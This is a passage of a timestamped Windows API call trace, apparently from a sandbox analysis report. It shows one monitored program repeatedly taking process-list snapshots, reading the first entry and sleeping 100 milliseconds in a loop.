dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.546] Sleep (dwMilliseconds=0x64) [0111.658] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0111.670] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.735] Sleep (dwMilliseconds=0x64) [0111.845] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0111.855] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.930] Sleep (dwMilliseconds=0x64) [0112.033] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0112.045] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.128] Sleep (dwMilliseconds=0x64) [0112.236] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0112.246] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.305] Sleep (dwMilliseconds=0x64) [0112.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0112.418] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.496] Sleep (dwMilliseconds=0x64) [0112.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0112.620] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.679] Sleep (dwMilliseconds=0x64) [0112.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0112.794] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.858] Sleep (dwMilliseconds=0x64) [0112.971] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0112.982] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.049] Sleep (dwMilliseconds=0x64) [0113.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0113.170] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.234] Sleep (dwMilliseconds=0x64) [0113.350] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0113.397] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.457] Sleep (dwMilliseconds=0x64) [0113.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0113.574] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.636] Sleep (dwMilliseconds=0x64) [0113.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0113.765] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.839] Sleep (dwMilliseconds=0x64) [0113.955] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0113.967] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.030] Sleep (dwMilliseconds=0x64) [0114.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0114.152] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.214] Sleep (dwMilliseconds=0x64) [0114.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0114.342] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.418] Sleep (dwMilliseconds=0x64) [0114.533] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0114.543] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.626] Sleep (dwMilliseconds=0x64) [0114.746] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0114.760] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.834] Sleep (dwMilliseconds=0x64) [0114.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0114.958] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.131] Sleep (dwMilliseconds=0x64) [0115.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0115.248] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.321] Sleep (dwMilliseconds=0x64) [0115.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0115.446] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.532] Sleep (dwMilliseconds=0x64) [0115.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0115.655] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.714] Sleep (dwMilliseconds=0x64) [0115.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0115.827] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.889] Sleep (dwMilliseconds=0x64) [0116.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0116.015] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.075] Sleep (dwMilliseconds=0x64) [0116.176] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0116.185] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.323] Sleep (dwMilliseconds=0x64) [0116.445] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0116.454] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.545] Sleep (dwMilliseconds=0x64) [0116.661] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0116.671] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.731] Sleep (dwMilliseconds=0x64) [0116.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0116.877] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.959] Sleep (dwMilliseconds=0x64) [0117.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0117.080] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.155] Sleep (dwMilliseconds=0x64) [0117.275] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0117.288] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.362] Sleep (dwMilliseconds=0x64) [0117.475] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0117.488] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.561] Sleep (dwMilliseconds=0x64) [0117.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0117.688] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.765] Sleep (dwMilliseconds=0x64) [0117.880] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0117.889] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.949] Sleep (dwMilliseconds=0x64) [0118.052] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0118.062] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.124] Sleep (dwMilliseconds=0x64) [0118.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0118.248] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.308] Sleep (dwMilliseconds=0x64) [0118.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0118.420] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.479] Sleep (dwMilliseconds=0x64) [0118.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0118.592] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.674] Sleep (dwMilliseconds=0x64) [0118.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0118.795] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.852] Sleep (dwMilliseconds=0x64) [0118.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0118.968] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.040] Sleep (dwMilliseconds=0x64) [0119.147] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0119.158] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.218] Sleep (dwMilliseconds=0x64) [0119.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0119.343] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.407] Sleep (dwMilliseconds=0x64) [0119.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0119.531] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.590] Sleep (dwMilliseconds=0x64) [0119.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0119.704] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.778] Sleep (dwMilliseconds=0x64) [0119.885] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0119.896] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.993] Sleep (dwMilliseconds=0x64) [0120.105] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0120.115] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.183] Sleep (dwMilliseconds=0x64) [0120.291] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0120.300] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.364] Sleep (dwMilliseconds=0x64) [0120.478] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0120.489] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.554] Sleep (dwMilliseconds=0x64) [0120.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0120.690] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.753] Sleep (dwMilliseconds=0x64) [0120.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0120.871] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.933] Sleep (dwMilliseconds=0x64) [0121.050] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0121.061] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.120] Sleep (dwMilliseconds=0x64) [0121.236] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0121.247] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.309] Sleep (dwMilliseconds=0x64) [0121.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0121.434] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.498] Sleep (dwMilliseconds=0x64) [0121.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0121.623] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.729] Sleep (dwMilliseconds=0x64) [0121.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0121.842] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.909] Sleep (dwMilliseconds=0x64) [0122.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0122.030] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.103] Sleep (dwMilliseconds=0x64) [0122.259] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0122.272] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.343] Sleep (dwMilliseconds=0x64) [0122.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0122.466] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.536] Sleep (dwMilliseconds=0x64) [0122.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0122.655] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.741] Sleep (dwMilliseconds=0x64) [0122.845] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0122.856] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.914] Sleep (dwMilliseconds=0x64) [0123.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0123.026] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.084] Sleep (dwMilliseconds=0x64) [0123.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0123.199] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, 